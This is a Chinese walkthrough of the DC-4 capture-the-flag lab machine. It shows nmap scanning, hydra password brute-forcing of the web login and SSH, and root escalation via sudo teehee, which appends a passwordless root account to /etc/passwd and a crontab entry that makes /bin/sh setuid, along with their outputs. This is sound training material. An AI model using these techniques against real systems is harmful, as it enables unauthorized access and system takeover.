DC-4靶机渗透实战
时间:2022-07-22
本文章向大家介绍DC-4靶机渗透实战,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
靶机介绍
这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:http://www.five86.com/dc-4.html
信息搜集
直接上nmap进行扫描
nmap -sV -A 172.16.0.16 -oN dc.nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:93:30:DE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
可知开放22、80端口,linux主机 web是一个登录框 考虑万能密码 注入 爆破
渗透实战
- 页面提示是admin的登录框,直接拿admin进行爆破
- 可以使用hydra、burpsuit爆破,以hydra为例
hydra -l admin -P /usr/share/john/password.lst -f 172.16.0.16 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -vV
[VERBOSE] Page redirected to http://172.16.0.16/index.php
[VERBOSE] Page redirected to http://172.16.0.16/index.php
[VERBOSE] Page redirected to http://172.16.0.16/index.php
[80][http-post-form] host: 172.16.0.16 login: admin password: happy
[STATUS] attack finished for 172.16.0.16 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
直接爆出账号密码 2. 同时用sqlmap简单测试下是否有注入漏洞
sqlmap -u http://172.16.0.16/ --data "username=admin&password=admin" --thread 10 --batch --dbs 发现没有注入漏洞
- 直接账号登录后台,有命令执行窗口,发现有4个用户
root charles jim sam
- 查看用户家目录文件,只有jim下有文件
You have selected: ls -R /home/
/home/:
charles
jim
sam
/home/charles:
/home/jim:
backups
mbox
test.sh
/home/jim/backups:
old-passwords.bak
/home/sam:
- 有个老密码字典,应该是提供给爆破ssh用
- mbox 猜测是有邮件信息
- 拿着密码字典去爆破ssh
hydra -L users.txt -P jimpass.txt ssh://172.16.0.16 -t 6 -f -vV
- 得到用户 jim 密码 jibril04,SSH登陆,登陆提示 邮件,查看/var/mail查看邮件内有charles的密码
[22][ssh] host: 172.16.0.16 login: jim password: jibril04
im@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charle
- 查看test.sh文件,发现是个小脚本文件,猜测后续能用上
jim@dc-4:~$ cat test.sh
#!/bin/bash
for i in {1..5}
do
sleep 1
echo "Learn bash they said."
sleep 1
echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."
hellwor
- 常规操作发现su是有权限的
jim@dc-4:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
jim@dc-4:~$ sudo -l
[sudo] password for jim:
Sorry, user jim may not run sudo on dc-4.
- 切换到charle用户中去,发现有teehee命令可以运行root权限
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
- 查看teehee命令用法,这是一个将内容添加到文件的命令
charles@dc-4:~$ teehee --h
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.
GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
- 提权方法,利用teehee加载内容到文件中获取root权限
- /etc/passwd文件echo "admin::0:0:admin::/bin/bash"|sudo teehee -a /etc/passwd #[用户名]:[密码]:[UID]:[GID]:[身份描述]:[主目录]:[登录shell]charles@dc-4:~
- 直接拿到root权限获取到最终的flag文件
- 新建一个具有和root一样大的权限的用户
- cat /etc/crontab# /etc/crontab: system-wide crontab# Unlike any other crontab you don't have to run the `crontab'# command to install the new version when you edit this file# and files in /etc/cron.d. These files also have username fields,# that none of the other crontabs do.SHELL=/bin/shPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user command17 * * * * root cd / && run-parts --report /etc/cron.hourly25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )#echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab 时间部分全部填写为*,默认这个定时任务每分钟执行一次。通过执行的脚本将 /bin/sh 的权限修改为4777,这样就可以在非root用户下执行它,并且执行期间拥有root权限。charles@dc-4:/home/jim
- 通过teehee的sudo提升权限以 root身份写入crontab计划任务通过执行获取root权限
最终打开的flag文件内容
root@dc-4:/root# cat flag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
- 【自然框架】注册会员活动——第一份代码的修改建议(第一版)
- 【视频】自然框架之分页控件的使用方法(一) PostBack方式的一般分页方式
- Java中的Socket编程学习
- 【视频】自然框架之分页控件的使用方法(二) 下载、DLL说明和web.config的设置
- Jsp开发中遇到的中文乱码问题及解决方法
- 开发中最常见的Java字符串问题总结
- .net异步性能测试(包括ASP.NET MVC WebAPI异步方法)
- Java 8的函数式编程学习
- 在C++中反射调用.NET(一) 反射调用第一个.NET类的方法
- QuickPager分页控件,最简单的设置代码
- Java中有关Null的9问题
- 在C++中反射调用.NET(二) 定义数据接口 绑定委托方法 使用SOD DTO 对象 将.NET对象转换到C++结构体为何不使用序列化的问题
- Java阻塞队列线程集控制的实现方法
- 【自然框架】QuickPager分页控件,新增一种分页方式——伪URL分页(Postback版)
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- jmeter 在linux服务器的安装和运行教程图解
- Linux中改变文件权限的chmod命令详析
- Ubuntu常用指令及用法详解
- Linux 系统使用私钥登录的教程详解
- Ubuntu如何轻松编译openJDK详解
- 详解Linux下Tomcat开启查看GC信息
- Centos7.4 zabbix3.4.7源码安装的方法步骤
- CentOS7环境搭建python3以及与python2实现共存的方法
- centos7.0安装离线JDK1.8方法详解
- ubuntu中swap(虚拟内存)设置方法
- 详解Linux监控重要进程的实现方法
- CentOS环境下安装Redis3.0及phpredis扩展测试示例
- 使用Apache commons-cli包进行命令行参数解析的示例代码
- 详解如何在Ubuntu 16.04上增加Swap分区
- Mac本地文件上传到CentOS云服务器方法